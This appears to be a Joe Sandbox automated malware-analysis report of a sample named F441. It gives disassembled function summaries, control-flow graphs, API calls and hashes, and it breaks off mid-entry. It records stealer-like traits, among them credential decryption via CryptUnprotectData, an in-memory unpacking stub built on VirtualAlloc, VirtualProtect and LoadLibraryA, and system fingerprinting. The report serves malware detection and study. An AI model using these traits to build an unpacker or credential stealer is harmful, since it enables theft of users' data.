631->620 631->621 631->624 631->628 665 4204d5-4204e5 632->665 633->632 654 420388-420390 635->654 650 420330-420370 636->650 645 420600-420617 call 439e00 638->645 646 4205ba-4205c6 638->646 642 420580-4205ae 639->642 643 4203b0-4203bf 640->643 647 420440-420448 641->647 648 42040a 641->648 642->638 642->642 643->641 643->643 645->620 645->621 645->624 645->628 645->631 655 4205d0-4205d7 646->655 657 420490 647->657 658 42044a-420455 647->658 656 420410-42043e 648->656 649->615 649->619 649->620 649->621 649->623 649->624 649->625 649->626 649->627 649->628 649->629 649->630 649->631 650->635 650->650 654->615 654->620 654->621 654->623 654->624 654->626 654->627 654->628 654->629 654->630 654->631 661 4205e0-4205e6 655->661 662 4205d9-4205dc 655->662 656->647 656->656 657->617 663 420460-420467 658->663 661->645 667 4205e8-4205fa call 4373e0 661->667 662->655 666 4205de 662->666 668 420470-420476 663->668 669 420469-42046c 663->669 665->615 665->618 665->619 665->620 665->621 665->622 665->623 665->624 665->625 665->626 665->627 665->628 665->629 665->630 665->631 666->645 667->645 668->657 672 420478-42048f call 4373e0 668->672 669->663 671 42046e 669->671 671->657 672->657
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: gdeb$gdeb$rr$}x$a_
                                                                                • API String ID: 0-3617765606
                                                                                • Opcode ID: ece44b61750e77531050f751d2c714b5c3d0fc1077405b2ce026a3a9abb68388
                                                                                • Instruction ID: 6e898c47a17abb5f03504fba61c95c3f7ffb61a8dca5b2db11db91053f235b82
                                                                                • Opcode Fuzzy Hash: ece44b61750e77531050f751d2c714b5c3d0fc1077405b2ce026a3a9abb68388
                                                                                • Instruction Fuzzy Hash: 4E2278B4108381DFE320CF24D895B6BBBE0FB86308F54892DE5D99B262D7399505CF96
                                                                                Function 00409960 Relevance: 6.7, Strings: 5, Instructions: 472COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0$01$ZR\;$[hct${hmn
                                                                                • API String ID: 0-1484469362
                                                                                • Opcode ID: 9addd3b863d326590257d70592a47e247d8e9e76fabce0ec909f09bc427e5ad8
                                                                                • Instruction ID: 48ecf83dcb48e748d01dfa638aea1d50d8185787a1297f3da60f3c5648012799
                                                                                • Opcode Fuzzy Hash: 9addd3b863d326590257d70592a47e247d8e9e76fabce0ec909f09bc427e5ad8
                                                                                • Instruction Fuzzy Hash: 971202B02083818BE724CF15C4A476FBBE1BBC6348F144D2DE5D58B292D77AD809CB96
                                                                                Function 0041537E Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 232encryptionCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041564F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: CryptDataUnprotect
                                                                                • String ID: .$=
                                                                                • API String ID: 834300711-1678909263
                                                                                • Opcode ID: 183ef4c1313d8aee56ada1eed8e8f16050662da6e108a753712437f4e389a81a
                                                                                • Instruction ID: 1ba618c7c74fca3a6dab2d59277d8eb37d046adcbf7b7a58cf2c090dca870eab
                                                                                • Opcode Fuzzy Hash: 183ef4c1313d8aee56ada1eed8e8f16050662da6e108a753712437f4e389a81a
                                                                                • Instruction Fuzzy Hash: 9481D5B1508740CFD724CF29C49179BBBE2AFD6308F184A2EE1A58B392D739D945CB46
                                                                                Function 00404970 Relevance: 2.9, Strings: 2, Instructions: 408COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: )$IEND
                                                                                • API String ID: 0-707183367
                                                                                • Opcode ID: e7903be39d4e34c9f5b2804a62402e159c365d2c7a7c9331be733edcae7195fd
                                                                                • Instruction ID: 05b6572399bca2268092eb3df2821dc4a125dc7a7576062249b5a2d5c26daba1
                                                                                • Opcode Fuzzy Hash: e7903be39d4e34c9f5b2804a62402e159c365d2c7a7c9331be733edcae7195fd
                                                                                • Instruction Fuzzy Hash: 4CE1B1B2A083449BD714CF28D88175B7BE5ABD4314F14853EFA95AB3C1D778E904CB8A
                                                                                Function 00420880 Relevance: 2.9, Strings: 2, Instructions: 390COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: ]hiX$gdeb
                                                                                • API String ID: 2994545307-4273025081
                                                                                • Opcode ID: 47f912e6e107acd04104a0d7df21dcaa4962048d756623bbe4edb9e7d625802a
                                                                                • Instruction ID: 336b67656a256fc3d7c49e2fee8c29aa2d9fc5d5d61a2c4a19b8c8911d00a2fb
                                                                                • Opcode Fuzzy Hash: 47f912e6e107acd04104a0d7df21dcaa4962048d756623bbe4edb9e7d625802a
                                                                                • Instruction Fuzzy Hash: B6C1E3B17083118FD714CF15D89172BBBE1EBD5318FA48A2EE4959B382D738D845CB8A
                                                                                Function 004168EF Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: IO
                                                                                • API String ID: 0-3981347273
                                                                                • Opcode ID: 29fb27968318ae9cb900c6618a64d07fe03029c203b194ad627e1d93fc6363e6
                                                                                • Instruction ID: 51fd4917a3c3351c2bbf2a3dc6b6b13a62bcc2487d4881d1c48f1649ea521d72
                                                                                • Opcode Fuzzy Hash: 29fb27968318ae9cb900c6618a64d07fe03029c203b194ad627e1d93fc6363e6
                                                                                • Instruction Fuzzy Hash: 94D132B1200B018BD724CF15C590B52BBF2FF4A704F158A9DD89A8FB56D739E985CB88
                                                                                Function 00415FE1 Relevance: .1, Instructions: 112COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a5d886a9cf1d364aeba75cbb5fbc2a0112e377b092f9423ae5a3a5703b18e045
                                                                                • Instruction ID: 02b8bb6e56041378f4f9f2711353cce18edc58b923ed8b10765db063976cd2a1
                                                                                • Opcode Fuzzy Hash: a5d886a9cf1d364aeba75cbb5fbc2a0112e377b092f9423ae5a3a5703b18e045
                                                                                • Instruction Fuzzy Hash: EA41BD745083528BC724CF14C8617ABB7E1FF89358F054A1DE9DA9B381E7389985CB8A
                                                                                Function 0042B20E Relevance: .0, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6267cfd9be4afba129147b6b4996751238124f7394fccf3144a8ff5b67e9c5bc
                                                                                • Instruction ID: 151cf318142fe4857ebf8dfdf36c3425f9736b69a2a980a3f824acb8caea4c7c
                                                                                • Opcode Fuzzy Hash: 6267cfd9be4afba129147b6b4996751238124f7394fccf3144a8ff5b67e9c5bc
                                                                                • Instruction Fuzzy Hash: 36F039B45093418FC320EF25D55474ABBE1ABD8304F01882DE489C7391DBB99858CF86
                                                                                Function 020F003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 195 20f003c-20f0047 196 20f004c-20f0263 call 20f0a3f call 20f0e0f call 20f0d90 VirtualAlloc 195->196 197 20f0049 195->197 213 20f028b-20f0292 196->213 214 20f0265-20f0289 call 20f0a69 196->214 200 20f004a 197->200 200->200 216 20f02a1-20f02b0 213->216 217 20f02ce-20f03c2 VirtualProtect call 20f0cce call 20f0ce7 214->217 216->217 218 20f02b2-20f02cc 216->218 225 20f03d1-20f03e0 217->225 218->216 226 20f0439-20f04b8 VirtualFree 225->226 227 20f03e2-20f0437 call 20f0ce7 225->227 229 20f04be-20f04cd 226->229 230 20f05f4-20f05fe 226->230 227->225 232 20f04d3-20f04dd 229->232 233 20f077f-20f0789 230->233 234 20f0604-20f060d 230->234 232->230 239 20f04e3-20f0505 LoadLibraryA 232->239 237 20f078b-20f07a3 233->237 238 20f07a6-20f07b0 233->238 234->233 235 20f0613-20f0637 234->235 240 20f063e-20f0648 235->240 237->238 241 20f086e-20f08be LoadLibraryA 238->241 242 20f07b6-20f07cb 238->242 243 20f0517-20f0520 239->243 244 20f0507-20f0515 239->244 240->233 247 20f064e-20f065a 240->247 252 20f08c7-20f08f9 241->252 245 20f07d2-20f07d5 242->245 246 20f0526-20f0547 243->246 244->246 248 20f07d7-20f07e0 245->248 249 20f0824-20f0833 245->249 250 20f054d-20f0550 246->250 247->233 251 20f0660-20f066a 247->251 253 20f07e4-20f0822 248->253 254 20f07e2 248->254 258 20f0839-20f083c 249->258 255 20f0556-20f056b 250->255 256 20f05e0-20f05ef 250->256 257 20f067a-20f0689 251->257 259 20f08fb-20f0901 252->259 260 20f0902-20f091d 252->260 253->245 254->249 261 20f056f-20f057a 255->261 262 20f056d 255->262 256->232 263 20f068f-20f06b2 257->263 264 20f0750-20f077a 257->264 258->241 265 20f083e-20f0847 258->265 259->260 267 20f057c-20f0599 261->267 268 20f059b-20f05bb 261->268 262->256 269 20f06ef-20f06fc 263->269 270 20f06b4-20f06ed 263->270 264->240 271 20f084b-20f086c 265->271 272 20f0849 265->272 279 20f05bd-20f05db 267->279 268->279 273 20f06fe-20f0748 269->273 274 20f074b 269->274 270->269 271->258 272->241 273->274 274->257 279->250
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 020F024D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: cess$kernel32.dll
                                                                                • API String ID: 4275171209-1230238691
                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction ID: fd96abfbcbc1ba3c88088248ade3727876ff70d63f7c93e0f6d1ce76c48a2d52
                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction Fuzzy Hash: 54526A74A01229DFDBA4CF58C984BACBBB1BF09304F1480D9E54DAB756DB30AA85DF14
                                                                                Function 0041CFA0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 200COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 476 41cfa0-41d014 477 41d016 476->477 478 41d069-41d0ac RtlExpandEnvironmentStrings 476->478 479 41d020-41d067 477->479 480 41d0b5 478->480 481 41d0ae-41d0b3 478->481 479->478 479->479 482 41d0b8-41d139 call 435440 RtlExpandEnvironmentStrings 480->482 481->482 485 41d189-41d1b6 482->485 486 41d13b 482->486 487 41d1b8-41d1bd 485->487 488 41d1bf-41d1c1 485->488 489 41d140-41d187 486->489 490 41d1c4-41d1db call 435440 487->490 488->490 489->485 489->489 493 41d201-41d211 490->493 494 41d1dd-41d1e6 490->494 496 41d231-41d242 call 43a250 493->496 497 41d213-41d21a 493->497 495 41d1f0-41d1ff 494->495 495->493 495->495 500 41d247-41d263 496->500 498 41d220-41d22f 497->498 498->496 498->498
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041D0A0
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041D0CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: K-K/$U5U7$\1B3
                                                                                • API String ID: 237503144-1235027928
                                                                                • Opcode ID: c674b7651ea3e55e9227b54ef7b57f94361ab8414c6d31006c9343337da9bb58
                                                                                • Instruction ID: 085b80d8ebaf4cdc089f22804327f41de0cf31be30b47905784d4d41386d2044
                                                                                • Opcode Fuzzy Hash: c674b7651ea3e55e9227b54ef7b57f94361ab8414c6d31006c9343337da9bb58
                                                                                • Instruction Fuzzy Hash: F76177B56083518FD324CF14C8A0BABB7E1EF8A308F054A1DE8E65B381D7749945CBA7
                                                                                Function 0041D8E0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 549 41d8e0-41d993 550 41d9d5-41da15 RtlExpandEnvironmentStrings 549->550 551 41d995 549->551 553 41da17-41da1c 550->553 554 41da1e 550->554 552 41d9a0-41d9d3 551->552 552->550 552->552 555 41da21-41da9f call 435440 RtlExpandEnvironmentStrings 553->555 554->555 558 41dae1-41daea call 417a30 555->558 559 41daa1 555->559 562 41daef-41daf2 558->562 561 41dab0-41dadf 559->561 561->558 561->561
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041DA0A
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0041DA3A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: eI.K$qs
                                                                                • API String ID: 237503144-3936219367
                                                                                • Opcode ID: 85c26f031341337586e1b5fec7c34aa25b76f3d64f86288b9f1c02943ea52ba5
                                                                                • Instruction ID: 3ad400ec4d5e0868339db15895de8c0dbb191545bfc635c07005ecffac5dc4ed
                                                                                • Opcode Fuzzy Hash: 85c26f031341337586e1b5fec7c34aa25b76f3d64f86288b9f1c02943ea52ba5
                                                                                • Instruction Fuzzy Hash: 915154B0100B009BD724CF26C890BA7BBB5FF46314F544A1CE8A64BB89D774F549CB98
                                                                                Function 00408EA0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 563 408ea0-408ead call 436950 566 408eb1-408eb8 call 431710 563->566 567 408eaf 563->567 571 408eba 566->571 572 408ebc-408ef7 GetStdHandle GetConsoleWindow call 408f20 call 40a390 566->572 569 408f0b-408f14 ExitProcess 567->569 573 408f04-408f09 call 4371d0 571->573 580 408ef9 572->580 581 408efb call 40f5b0 572->581 573->569 582 408f02 580->582 584 408f00 581->584 582->573 584->582
                                                                                APIs
                                                                                Strings
                                                                                • of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in, xrefs: 00408EDE
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID: of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in
                                                                                • API String ID: 621844428-2804141084
                                                                                • Opcode ID: d3fc2cdc024533b6e08ef3c83f20ae28995cdbdfa2716207c1ee4e745a0791f4
                                                                                • Instruction ID: 4cc74d5fb66ad9159a78e8348017eb50dff1af742bc963a264908d0417922e34
                                                                                • Opcode Fuzzy Hash: d3fc2cdc024533b6e08ef3c83f20ae28995cdbdfa2716207c1ee4e745a0791f4
                                                                                • Instruction Fuzzy Hash: A5F0FFB0408202CEC750BF72D70626A7BA5AF64364F10593FEAD5A12D1EE3C84459E5F
                                                                                Function 004337FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 585 4337fd-43385d call 439500 GetVolumeInformationW
                                                                                APIs
                                                                                • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00433840
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: InformationVolume
                                                                                • String ID: :$C$\
                                                                                • API String ID: 2039140958-3809124531
                                                                                • Opcode ID: cbbe94e1d607de42a8e897c5ed6c7dfebdb6e6a87b75144c6ad5122602fa5c3d
                                                                                • Instruction ID: 1368c0940c647f4f39a91e564e44146e6a68535283266bc39cb5798660f285bc
                                                                                • Opcode Fuzzy Hash: cbbe94e1d607de42a8e897c5ed6c7dfebdb6e6a87b75144c6ad5122602fa5c3d
                                                                                • Instruction Fuzzy Hash: 44F06575294701B7E718DF10EC56F1A32E0EB81B44F10482DB245AA1D0D7F5AA19DA5E
                                                                                Function 0042B5E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: AllocString
                                                                                • String ID: *$,
                                                                                • API String ID: 2525500382-162240353
                                                                                • Opcode ID: 6f887dd92c1e7d051b441eb50b8ce683dfa68637c71dffcb6e4b95598e80c62e
                                                                                • Instruction ID: 8755544d7d26afcd6c5da590c34bf048d679cfec69adbb61e5b4e032c319a10d
                                                                                • Opcode Fuzzy Hash: 6f887dd92c1e7d051b441eb50b8ce683dfa68637c71dffcb6e4b95598e80c62e
                                                                                • Instruction Fuzzy Hash: 2641C27450D7C18ED371CB28845C78BBFE0AB9A324F148A4DE0E94B2E2CB74510ADB97
                                                                                Function 004283B9 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 386COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042893E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                • String ID: sflQ
                                                                                • API String ID: 3960555810-3249545781
                                                                                • Opcode ID: 8302543d336a64d61fbfd091ffaf374d6ea3bc29c3405159477e15a25cf067dc
                                                                                • Instruction ID: ceaf3b536834eb6ea101402e43ebfa27eafed5b2e0152b17aac62569a04a8eaf
                                                                                • Opcode Fuzzy Hash: 8302543d336a64d61fbfd091ffaf374d6ea3bc29c3405159477e15a25cf067dc
                                                                                • Instruction Fuzzy Hash: 42E16F70205B918AD7258F39C4A47E7BBE1BF16305F98499EC0EB8B382DB396409CB55
                                                                                Function 0042880F Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 322COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042893E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                • String ID: sflQ
                                                                                • API String ID: 3960555810-3249545781
                                                                                • Opcode ID: eda0b82203ec5fd52a02e42ad8bc985fa3b6130ce1cc9c57a209a743f85e5ba8
                                                                                • Instruction ID: 4579460111167dd6f514478598ab714a340966e7b3f1678d87b811800d9ff980
                                                                                • Opcode Fuzzy Hash: eda0b82203ec5fd52a02e42ad8bc985fa3b6130ce1cc9c57a209a743f85e5ba8
                                                                                • Instruction Fuzzy Hash: A7C17F70205B918AD725CF35C4A07E7BBE1BF16304F98495ED0EB8B382DB796409CB55
                                                                                Function 0043551D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004355C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID: \-"#
                                                                                • API String ID: 3298025750-2514456039
                                                                                • Opcode ID: 859eba75cc14126060daa5553d4e99eea4a1c63d27fd1e683f7c5ac40af54193
                                                                                • Instruction ID: 4e5805d71c6b113a9038e1d4705d07e5b3b04c5f079926af7e5af699945cb8d6
                                                                                • Opcode Fuzzy Hash: 859eba75cc14126060daa5553d4e99eea4a1c63d27fd1e683f7c5ac40af54193
                                                                                • Instruction Fuzzy Hash: 5A1151716083019FD708CF50D8A475FFBE2FBC4328F148A1DE4A917691C3B99909CB86
                                                                                Function 00414EC0 Relevance: 3.2, APIs: 2, Instructions: 181COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00414EFA
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00414F28
                                                                                  • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 3432729115-0
                                                                                • Opcode ID: c009db615c638526771df0e05fb3056c90e96922816314dcb6ffecc14510497f
                                                                                • Instruction ID: 3bef7b545c1fe862b70271ecfb8295d17d8257d1e606da934cadffb5b9659bed
                                                                                • Opcode Fuzzy Hash: c009db615c638526771df0e05fb3056c90e96922816314dcb6ffecc14510497f
                                                                                • Instruction Fuzzy Hash: C351E0B41043018BD324CF14C891BABBBE5FFC5718F048A1DF9A69B391EB789941CB96
                                                                                Function 00417A30 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00417A6A
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00417A98
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID:
                                                                                • API String ID: 237503144-0
                                                                                • Opcode ID: 76c95b86170c2d249fc8a0b579228b811743fa26dcd10391b77df605b8ccdfce
                                                                                • Instruction ID: 9d185849e125c65ed9e76077d369fe8678050950fd45e526c791e55ee9a7ec59
                                                                                • Opcode Fuzzy Hash: 76c95b86170c2d249fc8a0b579228b811743fa26dcd10391b77df605b8ccdfce
                                                                                • Instruction Fuzzy Hash: 0F01D2755482047FD310AB25CC86F67776CEB86764F044619F9668B2D1EB30A908C6B6
                                                                                Function 004FF43E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 004FF466
                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 004FF486
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557763038.00000000004FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 004FE000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_4fe000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 3833638111-0
                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction ID: e44316986de41af896239358f6215100e2f3ee6432ea990fab01f99cbd048f2e
